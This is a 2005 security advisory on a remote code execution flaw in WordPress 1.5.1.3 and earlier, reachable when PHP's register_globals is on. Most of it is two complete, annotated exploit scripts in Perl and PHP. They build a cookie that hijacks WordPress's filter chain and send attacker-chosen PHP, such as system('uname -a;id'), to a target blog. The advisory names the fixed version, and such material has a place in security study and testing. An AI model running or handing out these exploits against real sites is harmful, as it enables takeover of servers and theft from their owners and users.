
WordPress Command Execution Vulnerability (Cache_lastpostdate)
Thursday, 11 August 2005
Summary
A vulnerability in WordPress's handling of incoming cookie data allows a remote attacker to execute arbitrary PHP code on the server when PHP's register_globals setting is On. With register_globals enabled, cookie values are imported as PHP globals; the exploits below use that to pre-populate the 'query_vars' filter chain with ordinary PHP functions, ending in preg_replace() with the /e (eval) modifier. Installations running with register_globals Off are not reachable by this vector, and the fix is to upgrade to WordPress 1.5.1.4 or later.

Credit:
The information has been provided by Kartoffelguru.

Details

Vulnerable Systems:
* WordPress version 1.5.1.3 and prior (only when PHP's register_globals is On)

Immune Systems:
* WordPress version 1.5.1.4 or newer

Perl Exploit:
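#!/usr/bin/perl
#
# WordPress <= 1.5.1.3 "cache_lastpostdate" remote code execution (2005).
# Converted to Perl by Noam from Kartoffelguru's PHP exploit.
#
# Precondition: the target runs PHP with register_globals=On, so every
# cookie sent here becomes a PHP global before WordPress runs.  The cookie
# built below pre-populates $wp_filter['query_vars'] with a chain of plain
# PHP functions (get_lastpostdate -> base64_decode -> parse_str ->
# get_lastpostmodified -> preg_replace) and seeds the two cache_* globals
# those functions read; the last hop is preg_replace() with the /e
# modifier, whose replacement string is "eval(base64_decode(<cmd>)).die()".
# WordPress 1.5.1.4 closed the hole, and the /e modifier no longer exists
# in current PHP.  Use only against hosts you are authorised to test.
#
use strict;
use warnings;
use MIME::Base64 qw(encode_base64 decode_base64);
use IO::Socket;

# PHP source to run when the caller passes an empty command.
my $DEFAULT_PHP = 'phpinfo();';

# Express $text as a chain of PHP chr() calls: "chr(97).chr(98)...chr(32)".
# The base64 blob travels inside a string that the target parse_str()s, so
# its '+', '/' and '=' would be mangled as URL syntax; chr() calls survive
# that.  The trailing chr(32) is part of the published payload and is kept
# as is (the target evidently tolerates the resulting trailing space).
sub php_chr_chain {
    my ($text) = @_;
    my @calls = map { "chr($_)" } unpack('C*', $text);
    return join('.', @calls, 'chr(32)');
}

# Build the Cookie header value for the request.  $php is the PHP source to
# execute on the target; the result is the "name=value; name=value" list the
# server imports as globals under register_globals.  The published exploit
# mixed ';' and '; ' as separators; a uniform '; ' (RFC 6265) is sent here.
sub build_cookie {
    my ($php) = @_;
    my $b64_cmd = encode_base64($php, '');    # '' = no line breaks in the output
    # args[0]/args[1] are presumably the replacement and subject that
    # preg_replace() receives after parse_str() has run, with the pattern
    # '//e' arriving via get_lastpostmodified() -- confirm against
    # apply_filters() in WP 1.5.1.3 before relying on the exact mapping.
    my $args = 'args[0]=eval(base64_decode(' . php_chr_chain($b64_cmd) . ')).die()&args[1]=x';
    my @pairs = (
        'wp_filter[query_vars][0][0][function]=get_lastpostdate',
        'wp_filter[query_vars][0][0][accepted_args]=0',
        'wp_filter[query_vars][0][1][function]=base64_decode',
        'wp_filter[query_vars][0][1][accepted_args]=1',
        'cache_lastpostmodified[server]=//e',    # pattern with the eval modifier
        'cache_lastpostdate[server]=' . encode_base64($args, ''),
        'wp_filter[query_vars][1][0][function]=parse_str',
        'wp_filter[query_vars][1][0][accepted_args]=1',
        'wp_filter[query_vars][2][0][function]=get_lastpostmodified',
        'wp_filter[query_vars][2][0][accepted_args]=0',
        'wp_filter[query_vars][3][0][function]=preg_replace',
        'wp_filter[query_vars][3][0][accepted_args]=3',
    );
    return join('; ', @pairs);
}

# Split "http://host[:port]/path" into (host, port, path); port defaults to
# 80 and path to "/".  Returns the empty list for anything else.  As
# published, the pattern ended in an unanchored non-greedy (.*?), which
# always captured an empty path, so the request went to "/" instead of the
# blog directory.
sub split_url {
    my ($url) = @_;
    my ($host, $port, $path) = $url =~ m{^http://([^/:]+)(?::(\d+))?(/.*)?$}
        or return;
    return ($host, defined $port ? $port : 80, defined $path ? $path : '/');
}

# Send one GET carrying $cookie and stream the reply to STDOUT.  HTTP/1.0 is
# used (as the PHP version does via CURL_HTTP_VERSION_1_0) so the body is
# not chunk-encoded, which this plain read loop would not decode; a Host
# header is still sent for name-based virtual hosts.
sub send_request {
    my ($host, $port, $path, $referer, $cookie) = @_;
    my $host_header = $port == 80 ? $host : "$host:$port";
    my $request = join("\r\n",
        "GET $path HTTP/1.0",
        "Host: $host_header",
        "Cookie: $cookie",
        "Referer: $referer",
        "Connection: close",
        "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
        '', '',
    );
    my $sock = IO::Socket::INET->new(Proto => 'tcp', PeerAddr => $host, PeerPort => $port)
        or die "cannot connect to http daemon on $host:$port: $@\n";
    print "Request: [$request]\n";
    print {$sock} $request;
    while (my $line = <$sock>) {
        print $line;
    }
    close $sock;
    return;
}

# Entry point: main(URL, PHP) -> exit status.  An empty PHP argument falls
# back to $DEFAULT_PHP; a missing one prints the usage and dies.
sub main {
    my ($url, $php) = @_;
    print "Wordpress <= 1.5.1.3 - remote code execution 0-DDAAYY exploit (Converted by Noam)\n";
    print "(C) Copyright 2005 Kartoffelguru\n";
    print "[!] info: requires register_globals turned on on target host\n";
    die "usage: $0 http://www.xyz.net/blog/ 'system(\"uname -a;id\");'\n"
        unless defined $url && defined $php;
    $php = $DEFAULT_PHP if length($php) == 0;
    my ($host, $port, $path) = split_url($url)
        or die "[-] not an http://host/path URL: $url\n";
    send_request($host, $port, $path, $url, build_cookie($php));
    return 0;
}

# Run only when executed directly, so the helpers can be require'd and tested.
exit main(@ARGV) unless caller;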

PHP Exploit:
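<?php
// WordPress <= 1.5.1.3 "cache_lastpostdate" remote code execution (2005).
//
// Precondition: the target runs PHP with register_globals=On, so the cookies
// sent below become PHP globals before WordPress runs.  They pre-populate
// the 'query_vars' filter chain with plain PHP functions and end in
// preg_replace() with the /e modifier eval()ing the supplied command.
// Fixed in WordPress 1.5.1.4; the /e modifier no longer exists in current
// PHP.  Use only against hosts you are authorised to test.
echo "Wordpress <= 1.5.1.3 - remote code execution 0-DDAAYY exploit\n";
echo "(C) Copyright 2005 Kartoffelguru\n";
echo "[!] info: requires register_globals turned on on target host\n";
if (!extension_loaded('curl')) {
    die("[-] you need the curl extension activated...\n");
}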

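/**
 * Print the command-line synopsis and exit.
 * The -c argument is PHP source and must be shell-quoted as a whole.
 */
function usage()
{
    die("usage: ./wpx.php -h http://www.xyz.net/blog/ -c 'system(\"uname -a;id\");'\n");
}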

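/**
 * Express $text as a chain of PHP chr() calls: "chr(97).chr(98)...chr(32)".
 * The base64 blob travels inside a string the target parse_str()s, where
 * '+', '/' and '=' would be read as URL syntax; chr() calls survive that.
 * The trailing chr(32) is part of the published payload (it also closes the
 * '.' left by the last pair) and is kept as is.
 */
function php_chr_chain($text)
{
    $chain = '';
    for ($i = 0; $i < strlen($text); $i++) {
        $chain .= 'chr(' . ord($text[$i]) . ').';
    }
    return $chain . 'chr(32)';
}

/**
 * Build the Cookie header value that drives the WordPress filter chain.
 * $php is the PHP source to execute on the target.  The published exploit
 * mixed ';' and '; ' as cookie separators; a uniform '; ' (RFC 6265) is
 * produced here.  The "code:"/"cnv:" lines are the original debug output.
 */
function build_cookie($php)
{
    $code = base64_encode($php);
    echo "code: $code\n";
    $cnv = php_chr_chain($code);
    echo "cnv: $cnv\n";
    // args[0]/args[1] are presumably the replacement and subject that
    // preg_replace() receives after parse_str(), with the pattern '//e'
    // arriving via get_lastpostmodified() -- confirm against apply_filters()
    // in WP 1.5.1.3 before relying on the exact mapping.
    $args = 'args[0]=eval(base64_decode(' . $cnv . ')).die()&args[1]=x';
    $pairs = array(
        'wp_filter[query_vars][0][0][function]=get_lastpostdate',
        'wp_filter[query_vars][0][0][accepted_args]=0',
        'wp_filter[query_vars][0][1][function]=base64_decode',
        'wp_filter[query_vars][0][1][accepted_args]=1',
        'cache_lastpostmodified[server]=//e',    // pattern with the eval modifier
        'cache_lastpostdate[server]=' . base64_encode($args),
        'wp_filter[query_vars][1][0][function]=parse_str',
        'wp_filter[query_vars][1][0][accepted_args]=1',
        'wp_filter[query_vars][2][0][function]=get_lastpostmodified',
        'wp_filter[query_vars][2][0][accepted_args]=0',
        'wp_filter[query_vars][3][0][function]=preg_replace',
        'wp_filter[query_vars][3][0][accepted_args]=3',
    );
    return implode('; ', $pairs);
}

$options = getopt("h:c:");
if (count($options) < 1 || !isset($options['h'])) {
    usage();
}

// getopt() returns an array when an option is repeated; use the first value.
// Despite its name, $host is the full blog URL (it goes to CURLOPT_URL).
$host = is_array($options['h']) ? $options['h'][0] : $options['h'];
$cmd = isset($options['c']) ? $options['c'] : '';
if (is_array($cmd)) {
    $cmd = $cmd[0];
}

if (!preg_match('#^http://#', $host)) {
    usage();
}

if (strlen(trim($cmd)) == 0) {
    $cmd = 'phpinfo();';
}

$cookie = build_cookie($cmd);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $host);
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_HEADER, 0);
// Was CURLOPT_CURLOPT_REFERER, an undefined constant, so no Referer was set.
curl_setopt($ch, CURLOPT_REFERER, $host);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)");
// HTTP/1.0 keeps the reply un-chunked so it can be echoed verbatim.
curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
echo "[+] now executing\n";

$r = curl_exec($ch);
if ($r === false) {
    // Previously a transport failure was silent: echoing false prints nothing.
    $err = curl_error($ch);
    curl_close($ch);
    die("[-] request failed: $err\n");
}
curl_close($ch);

echo $r;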

?>
